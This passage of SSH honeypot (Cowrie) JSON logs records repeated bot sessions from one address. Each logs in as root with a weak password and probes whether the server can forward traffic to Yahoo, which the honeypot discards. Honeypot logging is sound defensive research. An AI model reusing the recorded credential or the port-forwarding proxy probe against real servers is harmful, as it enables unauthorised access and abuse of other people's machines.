],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.903262Z","src_ip":"213.209.150.239","session":"dc2da5d13e98"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.138375Z","src_ip":"213.209.150.239","session":"dc2da5d13e98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29268,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29268","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.186636Z","session":"dc2da5d13e98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.234110Z","src_ip":"213.209.150.239","session":"dc2da5d13e98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":20055,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20055","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.369492Z","session":"dc2da5d13e98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.416659Z","src_ip":"213.209.150.239","session":"dc2da5d13e98"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.464344Z","src_ip":"213.209.150.239","session":"dc2da5d13e98"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49135,"dst_ip":"1.2.3.4","dst_port":22,"session":"39b139d1b910","protocol":"ssh","message":"New connection: 213.209.150.239:49135 (1.2.3.4:22) [session: 39b139d1b910]","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.510469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.511465Z","src_ip":"213.209.150.239","session":"39b139d1b910"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.558563Z","src_ip":"213.209.150.239","session":"39b139d1b910"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.792895Z","src_ip":"213.209.150.239","session":"39b139d1b910"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7240,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7240","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.841046Z","session":"39b139d1b910"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:43.888258Z","src_ip":"213.209.150.239","session":"39b139d1b910"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":32458,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:32458","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.025720Z","session":"39b139d1b910"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.073114Z","src_ip":"213.209.150.239","session":"39b139d1b910"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.121523Z","src_ip":"213.209.150.239","session":"39b139d1b910"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49186,"dst_ip":"1.2.3.4","dst_port":22,"session":"70ec15bd4946","protocol":"ssh","message":"New connection: 213.209.150.239:49186 (1.2.3.4:22) [session: 70ec15bd4946]","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.177421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.178092Z","src_ip":"213.209.150.239","session":"70ec15bd4946"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.234760Z","src_ip":"213.209.150.239","session":"70ec15bd4946"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.517005Z","src_ip":"213.209.150.239","session":"70ec15bd4946"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":27474,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27474","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.574355Z","session":"70ec15bd4946"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.631546Z","src_ip":"213.209.150.239","session":"70ec15bd4946"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":20052,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20052","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.787019Z","session":"70ec15bd4946"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.843622Z","src_ip":"213.209.150.239","session":"70ec15bd4946"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.900855Z","src_ip":"213.209.150.239","session":"70ec15bd4946"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49253,"dst_ip":"1.2.3.4","dst_port":22,"session":"3afb2ee53da3","protocol":"ssh","message":"New connection: 213.209.150.239:49253 (1.2.3.4:22) [session: 3afb2ee53da3]","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.956544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:44.957535Z","src_ip":"213.209.150.239","session":"3afb2ee53da3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.014094Z","src_ip":"213.209.150.239","session":"3afb2ee53da3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.295972Z","src_ip":"213.209.150.239","session":"3afb2ee53da3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":15821,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15821","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.354557Z","session":"3afb2ee53da3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.411263Z","src_ip":"213.209.150.239","session":"3afb2ee53da3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":5435,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5435","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.566912Z","session":"3afb2ee53da3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.623540Z","src_ip":"213.209.150.239","session":"3afb2ee53da3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.681238Z","src_ip":"213.209.150.239","session":"3afb2ee53da3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49311,"dst_ip":"1.2.3.4","dst_port":22,"session":"29a57a31d16f","protocol":"ssh","message":"New connection: 213.209.150.239:49311 (1.2.3.4:22) [session: 29a57a31d16f]","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.736531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.737365Z","src_ip":"213.209.150.239","session":"29a57a31d16f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:45.793885Z","src_ip":"213.209.150.239","session":"29a57a31d16f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.076331Z","src_ip":"213.209.150.239","session":"29a57a31d16f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":28229,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28229","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.133933Z","session":"29a57a31d16f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.190877Z","src_ip":"213.209.150.239","session":"29a57a31d16f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":17306,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17306","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.346910Z","session":"29a57a31d16f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.403403Z","src_ip":"213.209.150.239","session":"29a57a31d16f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.460949Z","src_ip":"213.209.150.239","session":"29a57a31d16f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49380,"dst_ip":"1.2.3.4","dst_port":22,"session":"4af19c539369","protocol":"ssh","message":"New connection: 213.209.150.239:49380 (1.2.3.4:22) [session: 4af19c539369]","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.507117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.507958Z","src_ip":"213.209.150.239","session":"4af19c539369"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.555393Z","src_ip":"213.209.150.239","session":"4af19c539369"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.789973Z","src_ip":"213.209.150.239","session":"4af19c539369"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14290,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14290","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.837995Z","session":"4af19c539369"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:46.885477Z","src_ip":"213.209.150.239","session":"4af19c539369"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2135,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2135","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.021467Z","session":"4af19c539369"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.068611Z","src_ip":"213.209.150.239","session":"4af19c539369"}
